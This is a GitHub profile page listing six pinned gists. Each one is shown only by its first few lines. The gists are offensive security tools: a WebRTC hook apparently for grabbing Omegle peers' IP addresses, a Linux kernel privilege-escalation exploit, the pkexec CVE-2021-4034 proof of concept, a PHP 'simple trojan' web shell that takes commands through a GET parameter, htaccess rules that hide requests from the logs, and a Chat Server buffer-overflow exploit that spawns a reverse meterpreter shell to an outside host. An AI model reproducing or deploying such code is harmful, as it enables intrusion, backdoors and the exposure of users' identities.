Skip to content
View oswoc's full-sized avatar

Block or report oswoc

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. script-omegle.js
    1
    window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection
    2
    window.RTCPeerConnection = function(…args) {
    3
    const pc = new window.oRTCPeerConnection(…args)
    4
    pc.oaddIceCandidate = pc.addIceCandidate
    5
    pc.addIceCandidate = function(iceCandidate, …rest) {
  2. Linux Kernel - local privilege escal...
    1
    /*
    2
     * #Linux Kernel Exploit
    3
     * Hi Hacker, Happy hacking VB
    4
     *
    5
     *
  3. blasty-vs-pkexec.c
    1
    /*
    2
     * blasty-vs-pkexec.c
    3
     * ------------------------------------------------
    4
     * PoC for CVE-2021-4034, shout out to Qualys
    5
     *
  4. Simple trojan in PHP.error_reporting...
    1
    <?php
    2
    error_reporting(0); 
    3
    $action = $_GET['cmd'];
    4
    $pw = $_GET['pw']; 
    5
    $password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
  5. http-htaccess.php
    1
    SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
    2
    <Limit GET POST HEAD>
    3
    order deny,allow
    4
    deny from all
    5
    allow from 127.0.0.1 (or the remote ip of the server).
  6. Chat Server - Remote Stack Buffer Ov...
    1
    # Exploit Title: Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
    2
    # Usage: python remCS.py <victim-ip> <port>
    3
    # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
    4
    # CVE: CVE-2004-2466 
    5
    # Installer: http://www.echatserver.com/

2 contributions in the last year

Contribution Graph
Day of Week March April May June July August September October November December January February March
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Less
No contributions.
Low contributions.
Medium-low contributions.
Medium-high contributions.
High contributions.
More

Contribution activity

March 2025

oswoc has no activity yet for this period.
Loading